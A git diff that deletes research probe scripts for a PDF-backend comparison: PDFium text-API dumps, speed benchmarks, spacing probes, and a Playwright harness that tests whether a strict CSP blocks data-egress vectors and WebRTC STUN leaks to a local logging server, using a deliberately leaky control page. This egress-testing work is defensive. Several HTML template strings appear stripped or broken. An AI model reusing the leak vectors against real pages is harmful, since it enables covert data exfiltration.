it index by index. -// -// Run: node probe_wasm_textapi.mjs --page N - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const { init } = require("@embedpdf/pdfium"); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const pageIdx = parseInt(args[args.indexOf("--page") + 1], 10) - 1; - -const pdfium = await init({ wasmBinary: readFileSync(require.resolve("@embedpdf/pdfium/pdfium.wasm")) }); -pdfium.PDFiumExt_Init?.(); - -// Availability is asked of the wrapper object, which is what a Python/JS adapter would -// call. A name missing here is missing in practice regardless of the symbol table. -const NEEDED = [ - "FPDFText_LoadPage", - "FPDFText_ClosePage", - "FPDFText_CountChars", - "FPDFText_GetUnicode", - "FPDFText_GetText", - "FPDFText_IsGenerated", - "FPDFText_IsHyphen", - "FPDFText_HasUnicodeMapError", - "FPDFText_GetCharBox", - "FPDFText_GetLooseCharBox", - "FPDFText_GetCharOrigin", - "FPDFText_GetMatrix", - "FPDFText_GetFontSize", - "FPDFText_GetFontInfo", - "FPDFText_GetFontWeight", - "FPDFText_GetCharAngle", - "FPDFText_GetTextIndexFromCharIndex", - "FPDFText_GetCharIndexFromTextIndex", -]; -const present = Object.fromEntries(NEEDED.map((n) => [n, typeof pdfium[n] === "function"])); - -const data = new Uint8Array(readFileSync(pdfPath)); -const dataPtr = pdfium.pdfium.wasmExports.malloc(data.length); -pdfium.pdfium.HEAPU8.set(data, dataPtr); -const doc = pdfium.FPDF_LoadMemDocument(dataPtr, data.length, ""); -const page = pdfium.FPDF_LoadPage(doc, pageIdx); -const tp = pdfium.FPDFText_LoadPage(page); -const n = pdfium.FPDFText_CountChars(tp); - -const boxPtr = pdfium.pdfium.wasmExports.malloc(32); -const matPtr = pdfium.pdfium.wasmExports.malloc(24); -const oxPtr = pdfium.pdfium.wasmExports.malloc(16); -const namePtr = pdfium.pdfium.wasmExports.malloc(256); -const flagsPtr = pdfium.pdfium.wasmExports.malloc(4); - -// Whether each call ever returned a non-trivial answer. A function that is exported but -// always fails would otherwise read as "available" while supplying nothing. -const exercised = { charbox: 0, matrix: 0, origin: 0, generated: 0, hyphen: 0, fontinfo: 0, maperror: 0 }; -const chars = []; -for (let i = 0; i < n; i++) { - const cp = pdfium.FPDFText_GetUnicode(tp, i); - const gen = pdfium.FPDFText_IsGenerated(tp, i); - const hyp = pdfium.FPDFText_IsHyphen(tp, i); - const mapErr = pdfium.FPDFText_HasUnicodeMapError(tp, i); - if (gen === 1) exercised.generated++; - if (hyp === 1) exercised.hyphen++; - if (mapErr === 1) exercised.maperror++; - - const okBox = pdfium.FPDFText_GetCharBox(tp, i, boxPtr, boxPtr + 8, boxPtr + 16, boxPtr + 24); - if (okBox) exercised.charbox++; - const okOrigin = pdfium.FPDFText_GetCharOrigin(tp, i, oxPtr, oxPtr + 8); - if (okOrigin) exercised.origin++; - const okMat = pdfium.FPDFText_GetMatrix(tp, i, matPtr); - if (okMat) exercised.matrix++; - const nameLen = pdfium.FPDFText_GetFontInfo(tp, i, namePtr, 256, flagsPtr); - if (nameLen > 0) exercised.fontinfo++; - - chars.push([ - cp, - gen, - hyp, - mapErr, - okOrigin ? r4(pdfium.pdfium.getValue(oxPtr, "double")) : null, - okOrigin ? r4(pdfium.pdfium.getValue(oxPtr + 8, "double")) : null, - okBox ? r4(pdfium.pdfium.getValue(boxPtr, "double")) : null, - okBox ? r4(pdfium.pdfium.getValue(boxPtr + 8, "double")) : null, - okMat ? r4(pdfium.FPDFText_GetFontSize(tp, i) * Math.hypot(pdfium.pdfium.getValue(matPtr, "float"), pdfium.pdfium.getValue(matPtr + 4, "float"))) : null, - nameLen > 0 ? pdfium.pdfium.UTF8ToString(namePtr) : "", - pdfium.FPDFText_GetTextIndexFromCharIndex(tp, i), - ]); -} - -process.stdout.write( - JSON.stringify({ - wrapper_version: JSON.parse( - readFileSync(require.resolve("@embedpdf/pdfium/pdfium.wasm").replace(/dist[/\\]pdfium\.wasm$/, "package.json")), - ).version, - entry_points_present: present, - all_present: Object.values(present).every(Boolean), - page: pageIdx + 1, - count_chars: n, - exercised, - chars, - }), -); - -pdfium.FPDFText_ClosePage(tp); -pdfium.FPDF_ClosePage(page); -pdfium.FPDF_CloseDocument(doc); - -function r4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/nocsp.html b/docs/research/pdf-backend-bakeoff/probes/nocsp.html deleted file mode 100644 index 6e2dd20f..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/nocsp.html +++ /dev/null @@ -1,3 +0,0 @@ -no CSP
running
- - diff --git a/docs/research/pdf-backend-bakeoff/probes/phase0_speed.py b/docs/research/pdf-backend-bakeoff/probes/phase0_speed.py deleted file mode 100644 index 439dc7ce..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/phase0_speed.py +++ /dev/null @@ -1,122 +0,0 @@ -"""Phase 0 gate 4: pdfminer.six speed on the largest corpus bills, vs the PDFium incumbent. - -The spec's kill condition: "if one document takes tens of seconds it is out on Phase 5 -grounds". Native timing is the floor; Pyodide adds the measured 1.6x-1.9x WASM penalty on -top, so a native number is multiplied by that band before comparing against the gate. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/phase0_speed.py -""" - -from __future__ import annotations - -import sys -import time -from pathlib import Path - -REPO = Path(__file__).resolve().parents[4] -sys.path.insert(0, str(REPO / "src")) - -WASM_PENALTY = (1.6, 1.9) # measured in the delivery spike - - -def page_count(path: Path) -> int: - import pypdfium2 as pdfium - - doc = pdfium.PdfDocument(str(path)) - try: - return len(doc) - finally: - doc.close() - - -def time_pdfium(path: Path, limit: int | None = None) -> tuple[float, int, int]: - """Full incumbent extraction (glyph sidecar included) over `limit` pages.""" - import ctypes - import math - - import pypdfium2 as pdfium - import pypdfium2.raw as raw_api - - doc = pdfium.PdfDocument(str(path)) - n_pages = len(doc) if limit is None else min(limit, len(doc)) - glyphs = 0 - t0 = time.perf_counter() - try: - for i in range(n_pages): - page = doc[i] - tp = page.get_textpage() - try: - text = tp.get_text_range() - n = raw_api.FPDFText_CountChars(tp.raw) - glyphs += max(n, 0) - for j in range(max(n, 0)): - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - if not raw_api.FPDFText_GetCharBox( - tp.raw, - j, - ctypes.byref(left), - ctypes.byref(right), - ctypes.byref(bottom), - ctypes.byref(top), - ): - continue - mat = raw_api.FS_MATRIX() - if not raw_api.FPDFText_GetMatrix(tp.raw, j, ctypes.byref(mat)): - continue - math.sqrt(mat.a * mat.a + mat.b * mat.b) - _ = text - finally: - tp.close() - page.close() - finally: - doc.close() - return time.perf_counter() - t0, n_pages, glyphs - - -def time_pdfminer(path: Path, limit: int | None = None) -> tuple[float, int, int]: - from pdfminer.high_level import extract_pages - from pdfminer.layout import LAParams, LTChar - - glyphs = 0 - pages = 0 - t0 = time.perf_counter() - # laparams=None disables layout analysis (the part ADR 0002 rejected); we only want - # glyph facts, so this is both faster and the honest configuration for this bake-off. - for layout in extract_pages(str(path), laparams=LAParams()): - pages += 1 - stack = list(layout) - while stack: - obj = stack.pop() - if isinstance(obj, LTChar): - glyphs += 1 - elif hasattr(obj, "__iter__"): - stack.extend(obj) - if limit is not None and pages >= limit: - break - return time.perf_counter() - t0, pages, glyphs - - -def main() -> None: - corpus = REPO / "tests" / "corpus" - pdfs = sorted(corpus.glob("*/*.pdf"), key=lambda p: -p.stat().st_size) - sample = int(sys.argv[1]) if len(sys.argv) > 1 else 25 - - print(f"{'document':<48} {'pages':>6} {'pdfium_s':>9} {'pdfminer_s':>11} {'ratio':>7}") - for pdf in pdfs[:3]: - total = page_count(pdf) - t_incumbent, n, g_i = time_pdfium(pdf, sample) - t_challenger, n2, g_m = time_pdfminer(pdf, sample) - label = f"{pdf.parent.name}/{pdf.name}" - ratio = t_challenger / t_incumbent if t_incumbent else float("inf") - print(f"{label:<48} {total:>6} {t_incumbent:>9.2f} {t_challenger:>11.2f} {ratio:>6.1f}x") - print( - f" sampled {n}/{n2} pages; glyphs pdfium={g_i} pdfminer={g_m}; " - f"projected full doc: pdfium {t_incumbent / n * total:.1f}s " - f"pdfminer {t_challenger / n2 * total:.1f}s " - f"(pyodide {t_challenger / n2 * total * WASM_PENALTY[0]:.0f}-" - f"{t_challenger / n2 * total * WASM_PENALTY[1]:.0f}s)" - ) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/phase4_egress.py b/docs/research/pdf-backend-bakeoff/probes/phase4_egress.py deleted file mode 100644 index 4b5f1772..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/phase4_egress.py +++ /dev/null @@ -1,296 +0,0 @@ -"""Phase 4: zero-egress proof, built to fail. - -Asserting an absence is the vacuous-pass case: a request counter reading zero looks -identical whether the guard works or the counter is broken. So this harness is judged by -whether it can CATCH a request, and that is tested explicitly rather than assumed. - -Four parts, all required: - - 1. `no-csp control` -- the same vectors with NO CSP. Any vector the browser permits - MUST be observed. This proves the harness can see egress at - all, and it is run FIRST: if it observes nothing, every later - zero is meaningless and the run aborts. - 2. `strict CSP` -- the production policy. Every vector attempted; assert the - server received nothing and the CDP request count is zero. - 3. `known-bad build` -- a page carrying the strict CSP but ALSO one deliberately - permitted beacon. The harness must catch it. Without this the - zero-egress claim is unfalsifiable. - 4. `severed network` -- all routes aborted; confirm the page still WORKS. This is the - inert form: if the build needed the network it fails closed - rather than leaking. - -Observation is at the NETWORK layer (the logging server plus CDP request events), never -at the JS layer. Under CSP most vectors report `attempted` with no exception and simply -produce no request, so a probe keyed on thrown errors would report exfiltration as -succeeding. - -Run (the server is started and stopped by this script): - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/phase4_egress.py \ - --out docs/research/pdf-backend-bakeoff/results/phase4.json -""" - -from __future__ import annotations - -import argparse -import json -import subprocess -import sys -import threading -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] - -PORT = 8973 -SETTLE_S = 4.0 - -STRICT_CSP = ( - "default-src 'none'; script-src 'self' 'unsafe-inline'; style-src 'unsafe-inline'; " - "img-src data:; connect-src 'none'; form-action 'none'; base-uri 'none'; " - "object-src 'none'; frame-src 'none'; worker-src 'none'" -) - -PAGE = """{title} -{csp} -
running
- -{extra} - -""" - -# The known-bad control's deliberate leak. It sits INSIDE the strict-CSP page, so the -# only thing distinguishing it from part 2 is one permitted destination -- which is -# exactly the discrimination the harness must be able to make. -KNOWN_BAD_EXTRA = f"""""" -KNOWN_BAD_CSP = ( - f'" -) - - -class Server: - """The logging server, run as a subprocess so its listeners are really separate.""" - - def __init__(self, dump: Path): - self.dump = dump - self.proc: subprocess.Popen | None = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "600"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(50): - if any("listening" in ln for ln in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("logging server did not start") - - def _drain(self): - assert self.proc and self.proc.stdout - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_exc): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - def observed_since(self, mark: int) -> list[str]: - return [ln.strip() for ln in self.lines[mark:] if "EGRESS OBSERVED" in ln] - - @property - def mark(self) -> int: - return len(self.lines) - - -def write_page(path: Path, title: str, tag: str, csp: str, extra: str = "") -> None: - path.write_text(PAGE.format(title=title, tag=tag, csp=csp, extra=extra)) - - -def run_case(browser, server: Server, page_path: Path, tag: str, offline: bool = False) -> dict: - """Load one fixture from file://, run every vector, report page + network views.""" - context = browser.new_context() - cdp_requests: list[str] = [] - context.on("request", lambda r: cdp_requests.append(f"{r.method} {r.url}")) - if offline: - # Sever the NETWORK, not the filesystem. Aborting `**` also kills the fixture's - # own file:// load, so the page never runs and the test passes for the wrong - # reason -- it would report "no egress" from a page that never executed. Only - # network schemes are aborted; reading the local artifact off disk is not egress. - context.route( - lambda url: url.startswith(("http://", "https://", "ws://", "wss://")), - lambda route: route.abort(), - ) - page = context.new_page() - mark = server.mark - page.goto(page_path.as_uri()) - # Polled from Python rather than with `page.wait_for_function`. Playwright's polling - # helper compiles a function in the page, which needs `unsafe-eval`; the strict CSP - # denies it, so wait_for_function times out on a page that in fact ran every vector - # to completion. That failure mode is dangerous rather than merely annoying: it makes - # a fully-executed run look stalled, and a stalled run's zero hits look like a pass. - page_report = "" - deadline = time.time() + 30 - while time.time() < deadline: - try: - page_report = page.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - element not present yet - page_report = "" - if "DONE" in page_report: - break - time.sleep(0.25) - time.sleep(SETTLE_S) # let late loads (webfont, worker, STUN) arrive - context.close() - - # Requests aimed at the logging host, as seen by CDP. file:// asset loads for the - # fixture itself are not egress and are excluded by host. - external = [r for r in cdp_requests if f"127.0.0.1:{PORT}" in r] - observed = server.observed_since(mark) - return { - "tag": tag, - # What the SERVER received. This alone decides the claim. - "server_observed": observed, - "server_http_hits": [ln for ln in observed if "[http]" in ln], - "server_stun_hits": [ln for ln in observed if "[stun]" in ln or "[udp]" in ln], - # What CDP saw the browser CREATE. A request object exists before CSP rules on - # it, so these are ATTEMPTS, not egress: under the strict policy this list is - # non-empty while the server receives nothing. Reported to keep the distinction - # visible rather than to prove anything. - "cdp_attempted_requests": external, - "page_report": page_report, - # Fail closed: a run that did not finish proves nothing, and its zero hits must - # never be read as a pass. - "vectors_completed": "DONE" in page_report, - "n_vectors_run": page_report.count(":attempted") + page_report.count(":threw"), - } - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, required=True) - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fixtures = PROBES / "egress-fixtures" - fixtures.mkdir(exist_ok=True) - (fixtures / "vectors.js").write_text((PROBES / "vectors.js").read_text()) - - write_page(fixtures / "nocsp.html", "no CSP", "nocsp", "") - write_page( - fixtures / "withcsp.html", - "strict CSP", - "withcsp", - f'', - ) - write_page(fixtures / "knownbad.html", "known-bad control", "knownbad", KNOWN_BAD_CSP, KNOWN_BAD_EXTRA) - - results: dict = {"port": PORT, "strict_csp": STRICT_CSP, "cases": {}} - args.out.parent.mkdir(parents=True, exist_ok=True) - - with Server(fixtures / "hits.json") as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - # PART 1 -- prove the harness can see egress at all, before trusting any zero. - control = run_case(browser, server, fixtures / "nocsp.html", "nocsp") - results["cases"]["1_no_csp_control"] = control - print( - f"1. no-CSP control: {len(control['server_http_hits'])} http + " - f"{len(control['server_stun_hits'])} stun at server; " - f"{control['n_vectors_run']} vectors ran (completed={control['vectors_completed']})", - flush=True, - ) - if not control["server_observed"]: - results["ABORTED"] = ( - "The no-CSP control observed ZERO egress. The harness cannot see a " - "request, so every later zero would be vacuous. Nothing below is " - "evidence of anything." - ) - args.out.write_text(json.dumps(results, indent=1)) - print(results["ABORTED"], file=sys.stderr) - return - - # PART 2 -- the production policy. - strict = run_case(browser, server, fixtures / "withcsp.html", "withcsp") - results["cases"]["2_strict_csp"] = strict - print( - f"2. strict CSP: {len(strict['server_http_hits'])} http + " - f"{len(strict['server_stun_hits'])} stun at server; " - f"{strict['n_vectors_run']} vectors ran (completed={strict['vectors_completed']}); " - f"{len(strict['cdp_attempted_requests'])} attempts created but blocked", - flush=True, - ) - - # PART 3 -- known-bad control. The harness MUST catch this one. - bad = run_case(browser, server, fixtures / "knownbad.html", "knownbad") - results["cases"]["3_known_bad"] = bad - caught = any("knownbad-beacon" in ln for ln in bad["server_observed"]) - results["known_bad_caught"] = caught - print( - f"3. known-bad: {len(bad['server_http_hits'])} http at server; " - f"deliberate beacon caught = {caught}", - flush=True, - ) - - # PART 4 -- severed network. The page must still complete. - offline = run_case(browser, server, fixtures / "withcsp.html", "offline", offline=True) - results["cases"]["4_severed_network"] = offline - print( - f"4. severed net: page completed = {offline['vectors_completed']} " - f"({offline['n_vectors_run']} vectors); " - f"{len(offline['server_http_hits'])} http at server", - flush=True, - ) - finally: - browser.close() - - strict_case = results["cases"].get("2_strict_csp", {}) - control_case = results["cases"]["1_no_csp_control"] - results["verdict"] = { - # The harness is only trustworthy if it has been SEEN to catch a request, twice: - # once with no policy at all, once with a policy plus a deliberate leak. - "harness_can_detect_egress": bool(control_case["server_http_hits"]), - "harness_can_detect_udp": bool(control_case["server_stun_hits"]), - "known_bad_caught": results.get("known_bad_caught", False), - # Fail closed: a run that did not execute its vectors proves nothing, and its - # zero hits must never be read as a pass. - "strict_run_completed": strict_case.get("vectors_completed", False), - "strict_vectors_run": strict_case.get("n_vectors_run", 0), - "strict_csp_http_hits": len(strict_case.get("server_http_hits", [])), - "strict_csp_udp_hits": len(strict_case.get("server_stun_hits", [])), - "offline_run_completed": results["cases"] - .get("4_severed_network", {}) - .get("vectors_completed", False), - # The claim, scoped to what CSP actually governs. - "csp_blocks_every_subresource_vector": bool( - strict_case.get("vectors_completed") and not strict_case.get("server_http_hits") - ), - # ... and the channel it does NOT govern, named rather than omitted. - "webrtc_egress_survives_csp": bool(strict_case.get("server_stun_hits")), - } - results["verdict"]["zero_egress_claim_earned"] = bool( - results["verdict"]["harness_can_detect_egress"] - and results["verdict"]["known_bad_caught"] - and results["verdict"]["strict_run_completed"] - and results["verdict"]["csp_blocks_every_subresource_vector"] - ) - args.out.write_text(json.dumps(results, indent=1)) - print(json.dumps(results["verdict"], indent=1), flush=True) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py b/docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py deleted file mode 100644 index 0b084bb0..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/phase4_webrtc.py +++ /dev/null @@ -1,200 +0,0 @@ -"""Phase 4 follow-up: is the WebRTC channel that survives CSP actually closable? - -The main harness found that a strict CSP blocks all fourteen subresource vectors and does -NOT block WebRTC: five STUN binding requests reached the logging server. CSP has no -directive governing ICE, so this is a policy gap rather than a misconfiguration, and -reporting it without testing a mitigation would leave the delivery decision no better off. - -Three candidate mitigations, measured rather than assumed: - - A. sandboxed iframe -- run the engine inside ` -""" - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "300"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(50): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - @property - def mark(self): - return len(self.lines) - - def stun_since(self, mark: int) -> list[str]: - return [x for x in self.lines[mark:] if "[stun]" in x or "[udp]" in x] - - @staticmethod - def source_ports(hits: list[str]) -> set[str]: - """Distinct UDP source ports in a set of hits. - - Load-bearing for the comparison: STUN retransmits, so N datagrams may be one - connection retrying. If every variant reported the same source port, they would - be one attempt counted three times rather than three independent attempts, and - the whole comparison would be void. - """ - return {h.rsplit(":", 1)[-1].strip() for h in hits} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=None) - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - (fx / "child.html").write_text(CHILD % {"port": PORT}) - - variants = { - "C_baseline_no_sandbox": { - "csp": f'', - "sandbox": "", - }, - "A_sandbox_allow_scripts": { - "csp": f'', - "sandbox": 'sandbox="allow-scripts"', - }, - "B_permissions_policy": { - "csp": f'', - "sandbox": "allow=\"camera 'none'; microphone 'none'; display-capture 'none'\"", - }, - } - - results: dict = {"variants": {}} - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - for name, cfg in variants.items(): - (fx / f"parent_{name}.html").write_text( - PARENT % {"title": name, "csp": cfg["csp"], "sandbox": cfg["sandbox"]} - ) - ctx = browser.new_context() - page = ctx.new_page() - mark = server.mark - page.goto((fx / f"parent_{name}.html").as_uri()) - report = "" - deadline = time.time() + 20 - while time.time() < deadline: - for frame in page.frames: - if frame == page.main_frame: - continue - try: - report = frame.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - child not ready yet - continue - if "DONE" in report: - break - time.sleep(0.25) - time.sleep(3) - stun = server.stun_since(mark) - ctx.close() - ports = Server.source_ports(stun) - results["variants"][name] = { - "sandbox_attr": cfg["sandbox"], - "stun_datagrams": len(stun), - "stun_source_ports": sorted(ports), - "webrtc_blocked": len(stun) == 0, - "child_ran": "DONE" in report, - "child_report": report.replace("\n", " | ")[:200], - } - print( - f"{name:<26} stun={len(stun):2d} ports={sorted(ports)} " - f"blocked={len(stun) == 0} child_ran={'DONE' in report} :: {report.replace(chr(10), ' | ')[:80]}", - flush=True, - ) - browser.close() - - print(json.dumps(results, indent=1)) - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py b/docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py deleted file mode 100644 index a3b9f585..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py +++ /dev/null @@ -1,206 +0,0 @@ -"""Which candidate backends can satisfy the hybrid contract, and how do they mark a -synthesised space? - -This exists because the first draft of the portability assessment asserted, from the -shape of each library's API, that the hybrid contract would narrow the candidate set. The -assertion was wrong on the first backend checked, so the question is measured instead. - -Two things are asked of each backend, on a boundary the glyph seam is known to lose -(`NATIONAL CEMETERY ADMINISTRATION`, where the gap is 2.40 pt against a 3.50 pt threshold): - - 1. Does the backend's OWN text output carry the word space? This is the half of the - hybrid contract that fixes the defect. - 2. What form does the synthesised character take, and is it distinguishable from a - space read out of the content stream? This is what decides whether an adapter can - avoid consuming placeholder geometry. - -Reported per backend rather than pooled: the answers differ in kind, not in degree, and a -single "supported / unsupported" column would hide that. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_backend_spacing.py -""" - -from __future__ import annotations - -import argparse -import ctypes -import json -import subprocess -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -PROBE_TEXT = "CEMETERY ADMINISTRATION" -PROBE_JOINED = PROBE_TEXT.replace(" ", "") - - -def probe_pdfium(pdf: Path, page: int) -> dict: - import pypdfium2 as pdfium - import pypdfium2.raw as R - - doc = pdfium.PdfDocument(str(pdf)) - try: - pg = doc[page - 1] - tp = pg.get_textpage() - raw = tp.raw - n = R.FPDFText_CountChars(raw) - seq = "".join(chr(R.FPDFText_GetUnicode(raw, i)) for i in range(n)) - k = seq.find(PROBE_TEXT) - marker = None - if k >= 0: - i = k + PROBE_TEXT.index(" ") - left, right, bottom, top = (ctypes.c_double() for _ in range(4)) - R.FPDFText_GetCharBox(raw, i, *(ctypes.byref(v) for v in (left, right, bottom, top))) - marker = { - "generated_flag": R.FPDFText_IsGenerated(raw, i) == 1, - "box_area": round((right.value - left.value) * (top.value - bottom.value), 6), - } - tp.close() - pg.close() - finally: - doc.close() - return { - "recovers_space": k >= 0, - "produces_joined_form": PROBE_JOINED in seq, - "generated_marker": "FPDFText_IsGenerated flag; zero-area box, origin only", - "detail": marker, - } - - -def probe_pdfminer(pdf: Path, page: int) -> dict: - from pdfminer.high_level import extract_pages - from pdfminer.layout import LAParams, LTAnno, LTChar - - def walk(o): - for c in getattr(o, "_objs", []): - yield c - yield from walk(c) - - pg = next(iter(extract_pages(str(pdf), page_numbers=[page - 1], laparams=LAParams()))) - seq_objs = [o for o in walk(pg) if isinstance(o, (LTChar, LTAnno))] - seq = "".join(o.get_text() for o in seq_objs) - k = seq.find(PROBE_TEXT) - marker = None - if k >= 0: - o = seq_objs[k + PROBE_TEXT.index(" ")] - marker = {"class": type(o).__name__, "has_bbox": hasattr(o, "bbox")} - return { - "recovers_space": k >= 0, - "produces_joined_form": PROBE_JOINED in seq, - "generated_marker": "LTAnno object (distinct class, carries no bbox at all)", - "detail": marker, - } - - -def probe_pymupdf(pdf: Path, page: int) -> dict: - import pymupdf - - d = pymupdf.open(str(pdf)) - try: - raw = d[page - 1].get_text("rawdict") - chars = [c for b in raw["blocks"] for ln in b.get("lines", []) for s in ln.get("spans", []) for c in s["chars"]] - seq = "".join(c["c"] for c in chars) - k = seq.find(PROBE_TEXT) - marker = None - if k >= 0: - c = chars[k + PROBE_TEXT.index(" ")] - x0, y0, x1, y1 = c["bbox"] - marker = {"box_area": round((x1 - x0) * (y1 - y0), 4)} - finally: - d.close() - return { - "recovers_space": k >= 0, - "produces_joined_form": PROBE_JOINED in seq, - "generated_marker": "NONE - synthesised spaces get a real box and are indistinguishable", - "detail": marker, - } - - -_PDFJS = """ -import { readFileSync } from "node:fs"; -const pdfjs = await import("pdfjs-dist/legacy/build/pdf.mjs"); -const doc = await pdfjs.getDocument({ data: new Uint8Array(readFileSync(process.argv[2])) }).promise; -const tc = await (await doc.getPage(parseInt(process.argv[3], 10))).getTextContent(); -const joined = tc.items.map(i => i.str).join(""); -let opp = 0, lost = 0; -for (let i = 1; i < tc.items.length; i++) { - const a = tc.items[i-1], b = tc.items[i]; - if (!a.str || !b.str || a.hasEOL || a.fontName === b.fontName) continue; - if (Math.abs(a.transform[5] - b.transform[5]) > 0.6) continue; - opp++; - if (!a.str.endsWith(" ") && !b.str.startsWith(" ") && b.transform[4] - (a.transform[4] + a.width) > 1.0) lost++; -} -console.log(JSON.stringify({ items: tc.items.length, chars_per_item: +(joined.length/tc.items.length).toFixed(1), - recovers_space: joined.includes(process.argv[4]), produces_joined_form: joined.includes(process.argv[5]), - font_boundary_adjacencies: opp, font_boundary_spaces_lost: lost })); -""" - - -def probe_pdfjs(pdf: Path, page: int) -> dict: - script = PROBES / "js" / "_probe_backend_spacing.mjs" - script.write_text(_PDFJS) - try: - r = subprocess.run( - ["node", str(script), str(pdf.resolve()), str(page), PROBE_TEXT, PROBE_JOINED], - capture_output=True, - text=True, - cwd=str(script.parent), - ) - if r.returncode != 0: - return {"error": r.stderr[-400:]} - d = json.loads(r.stdout.strip().splitlines()[-1]) - finally: - script.unlink(missing_ok=True) - return { - "recovers_space": d["recovers_space"], - "produces_joined_form": d["produces_joined_form"], - "generated_marker": "NONE - text-item granularity, no per-character box at all", - "detail": d, - } - - -BACKENDS = { - "pdfium": probe_pdfium, - "pdfminer.six": probe_pdfminer, - "pymupdf": probe_pymupdf, - "pdf.js": probe_pdfjs, -} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--pdf", type=Path, default=REPO / "tests/corpus/114-hr-2029/4_reported-in-senate.pdf") - ap.add_argument("--page", type=int, default=99) - ap.add_argument("--out", type=Path) - args = ap.parse_args() - - out = {"pdf": str(args.pdf.relative_to(REPO)), "page": args.page, "probe_text": PROBE_TEXT, "backends": {}} - print(f"# {PROBE_TEXT!r} on {args.pdf.name} page {args.page}") - print(f" (the neutral glyph layer produces {PROBE_JOINED!r} here from PDFium's geometry)\n") - for name, fn in BACKENDS.items(): - try: - out["backends"][name] = fn(args.pdf, args.page) - except Exception as exc: # noqa: BLE001 - out["backends"][name] = {"error": f"{type(exc).__name__}: {exc}"} - r = out["backends"][name] - print( - f" {name:<14} own text keeps the space: {str(r.get('recovers_space')):<5} " - f"joined form present: {str(r.get('produces_joined_form')):<5}" - ) - print(f" synthesised-char marker: {r.get('generated_marker', r.get('error'))}") - if r.get("detail"): - print(f" {r['detail']}") - - if args.out: - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(out, indent=1)) - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/probe_charstream.py b/docs/research/pdf-backend-bakeoff/probes/probe_charstream.py deleted file mode 100644 index 50c5f0f9..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/probe_charstream.py +++ /dev/null @@ -1,193 +0,0 @@ -"""Probe: dump PDFium's text-page CHARACTER STREAM with per-index geometry and font. - -The research question this exists to settle: is PDFium's own indexed character stream --- the one `FPDFText_GetText` / `get_text_range()` returns, including the spaces PDFium -GENERATES rather than reads from the content stream -- addressable by the same char -index that `FPDFText_GetCharBox` / `GetMatrix` / `GetFontSize` / `GetFontInfo` take? - -If yes, a backend adapter can hand DeltaTrack an ordered stream that already carries -PDFium's word-spacing, hyphenation and reading-order decisions, WITH geometry attached, -instead of DeltaTrack re-deriving those from raw glyph positions. - -Emits, per char index: - index -> unicode -> generated? -> hyphen? -> unicode-map-error? - -> charbox / loose charbox / origin -> font size (raw and matrix-scaled) - -> font name + flags + weight -> text index - -Nothing in `src/deltatrack` is imported or modified. Read-only. - -Run: - .venv/bin/python docs/research/pdf-backend-bakeoff/probes/probe_charstream.py \ - tests/corpus/114-hr-2029/4_reported-in-senate.pdf --page 9 --grep FAMILY -""" - -from __future__ import annotations - -import argparse -import ctypes -import json -import math -import sys -from pathlib import Path - -import pypdfium2 as pdfium -import pypdfium2.raw as R - -_FONT_BUF = 256 - - -def _tri(v: int) -> bool | None: - """FPDFText_IsGenerated / IsHyphen / HasUnicodeMapError return 1 / 0 / -1.""" - return None if v < 0 else bool(v) - - -def char_records(textpage, page_obj) -> 